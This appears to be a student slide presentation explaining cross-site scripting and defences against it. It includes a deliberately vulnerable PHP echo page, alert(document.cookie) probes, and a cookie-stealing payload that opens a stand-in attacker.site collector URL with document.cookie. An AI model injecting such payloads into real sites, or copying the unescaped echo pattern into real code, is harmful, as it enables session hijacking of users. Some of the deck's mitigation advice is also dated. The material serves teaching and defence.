Cross site scripting Firas mohamed tahir Supervised by :Dr lo’ay twalbeh
introduction • There are many techniques which an intruder can use to compromise the web application. • One such techniques is called xxs or across site script. • With the help of such vulnerability intruder can easily use some social engineering trick to reveal access credentials of users • It can also invoke an automated script to perform some operations.
Introduction(con…) • Cross site scripting(css for short,but some times abbreviated as xss). • Xss is one of the most common application level attacks that hackers use to sneak in to web applications. • Xss is an attack on the privacy of clients of particular web site which can lead to a total breach of security when customer details are stolen or manipulated. • The common language used for xss include java script,vbscript,Html,c++,active x and flash.
Introduction(con…) • Many web site make extensive use of client-side scripts(mostly written in java script). • There are many applications which are designed to permit the input of Html tags for displaying the Html formatted data. • These tags can be used by malicious users to attack other users by inserting scripts or malicious applets. • Xss is unlike most attack which involves two parties the attacker and victim client. • The css attack involves three parties the attacker,a client and web site.
Introduction(con…) • Such attack are result of poor input validations, it uses the combination of html and java script. • An intruder can misguide the client and perform various attack from Dos(by opening enormous amount of window on client site,or embedding malicious FORM tags at the right place. • Malicious user may be able to trick users into revealing sensitive information by modifying the behavior of existing form or by embedding scripts. • Scripting tags that take advantage of xss include<script>,<applet>,<object>,embedandform.
Introduction(con…) • Recent trends in information systems security show a significant increase in cross site scripting(xss) vulnerabilities. • Due to the convergence of control system technology and information systems technology, a determined attacker could use knowledge of xss vulnerabilities to access control system network. • Xss involves the posting of malicious web programming instruction to a web-accessible location contrary to the intentions of location owners. • The goal of the xss attack is to steal the client cookies, or any other sensitive information which can identifying the client with the website.
Scope and feasibility • How it is performed • Suppose we are using a application which takes some data from the user say username and password. then it is displaying that data. • now if this data is not validates properly then it can creates some real surprise as we can see bellow . • consider the following code in php which takes some data and then it will display it:
Scope and feasibility(con…) **code listing for test_submit.php** <? $Name=$_POST['name']; echo "<html> <body>"; echo $Name; echo" </body> </html>"; ?> Now it is clear that the data is posted from a form. assume that previous form contains a textbox called ‘name’ .so it will have something similar coding.
Scope and feasibility(con…) **code listing for test.php** <html> <head> <title> xss test page </title> </head> <body> <form name="form1" action="test_sub.php" method="post"> Name:<input type="text" name="name"> <input type="submit" value="submit"> </body> </html>
Variations on the theme • Now when a user press the submit button the data in textbox get passed to another form test_submit.php. as from the coding it is clear that the posted data is stored in a variable called ‘name’ . • So from above it is clear that if a user post a simple value then it is simply displayed on the screen but If suppose a user enter following in the name field:- <script language=java script>alert (document .name); </script>. Then he will get a msgbox as shown in the following picture:-
Variations on the theme(con…) • So from the picture it is clear that if the entered data is not validated properly then a malicious user can execute his own html or script code . • this can lead to a potentially dangerous situation. specially if your application is storing critical information and if you have something from which a attacker can be benefited. • with a combination of html and java script a attacker can misguide user and can spoof there real identity.
Full explanation-the css technique(con…) GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0 Host: www.vulnerable.site And the response would be: <HTML> <Title>Welcome!</Title> Hi Joe Hacker <BR> Welcome to our system ... </HTML>
Full explanation-the css technique(con…) • Such a link looks like: http://www.vulnerable.site/welcome.cgi?name=<script>alert(document. cookie)</script> • The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows: GET /welcome.cgi?name=<script>alert(document. cookie)</script> HTTP/1.0 Host: www.vulnerable.site • And the vulnerable site response would be: <HTML> <Title>Welcome!</Title> Hi <script>alert(document.cookie)</script> <BR> Welcome to our system ... </HTML>
Full explanation-the css technique(con…) • The malicious link would be: • http://www.vulnerable.site/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script> • And the response page would look like:
Full explanation-the css technique(con…) <HTML> <Title>Welcome!</Title> Hi <script>window.open(“http://www.attacker.site/collect.cgi?cookie=”+document.cookie)< /script> <BR> Welcome to our system ... </HTML>
Protecting from attack How to protect from such attacks? • A straight forward solution to this problem is disabling the scripting language !!!but due to • many reasons it is not possible to use this solutions. there are various ways by which such kind of attacks can be prevented. 1) Always properly validate the data: to secure your web applications from such attacks it is necessary to check the user data for any unnecessary characters or input strings. please make sure that u check the POST data, URL strings, Cookies etc and remove any unwanted character or string like <script> etc from it. this is the general way from where a malicious user try to compromise your web application.
Protecting from attack(con…) 2) Limit Input Lengths :this is another way of securing web applications from malicious inputs. always make sure that about restricted the length of the variables that want to use in the applications and check them properly for any violations. 3)Use HTTP POST Method rather then Using GET:GET makes the web application more vulnerable to such kind of attacks as some one can easily play with the input. If possible prefer post method then using GET method. 4)Verify the cookie data: web application uses cookie for managing the state of communication. as it is stored on client side, it is necessary to check the cookie data before use it. 5)Filter Output: Always filter out the output content that going to display. it will reduces the chance of XSS attacks.
Securing a site against css attacks How to perform Input Validation • Check if the input is what you expect - Do not try to check for "bad input" • Black list testing is no solution -Black lists are never complete! • White list testing is better -Only what you expect will pass -(correct) Regular expressions
Securing a site against css attacks(con…) • Cookie Options mitigate the impact • Complicate attacks on Cookies • "httpOnly" Cookies – Prevent disclosure of cookie via DOM access • IE only currently • use with care, compatibility problems may occur – But: cookies are sent in each HTTP requests • E.G. Trace-Method can be used to disclose cookie – Passwords still may be stolen via XSS • "secure" Cookies – Cookies are only sent over SSL
Securing a site against css attacks(con…) • Web Application Firewalls – Check for malicious input values – Check for modification of read-only parameters – Block requests or filter out parameters • Can help to protect „old“ applications – No source code available – No know-how available – No time available • No general solution – Usefulness depends on application – Not all applications can be protected
What went wrong? This is NO Solution! • SSL: – Attack is not based on communication security flaws – Attack is based on application security problems • Client side input checking: – Can be subverted easily – Direct URL access <form method="GET" action="/file.jsp"> <input type="text" name=“fname“ maxlength="10"> ______________________________________ GET /file.jsp?fname=123456789012345
What went wrong?(con…) • By the way • Web Services are affected by XSS too – Become more and more standard – Access protocol is often HTTP – Data transfer using XML • Attack: Submitting SOAP-Response-Values as Request-Values • Often HTML rendering engines are used for display – Force “traditional” XSS attack code in output
How sanctum’s appsld protects against css attacks(con…) • In the example, there is a parameter whose value contains the string <script>window.open(“http://www.attacker.site/collect.cgi?cookie= ”+document.cookie)</script> Upon spotting this illegal pattern, AppShield blocks the request and logs the attack attempt.
conclusion • Cross-Site Scripting is extremely dangerous – Identity theft, Impersonation • Cause: Missing or in-sufficient input validation • XSS-Prevention Best Practices – Implement XSS-Prevention in application – Do not assume input values are benign – Do not trust client side validation – Check and validate all input before processing – Do not echo any input value without validation – Use one conceptual solution in all applications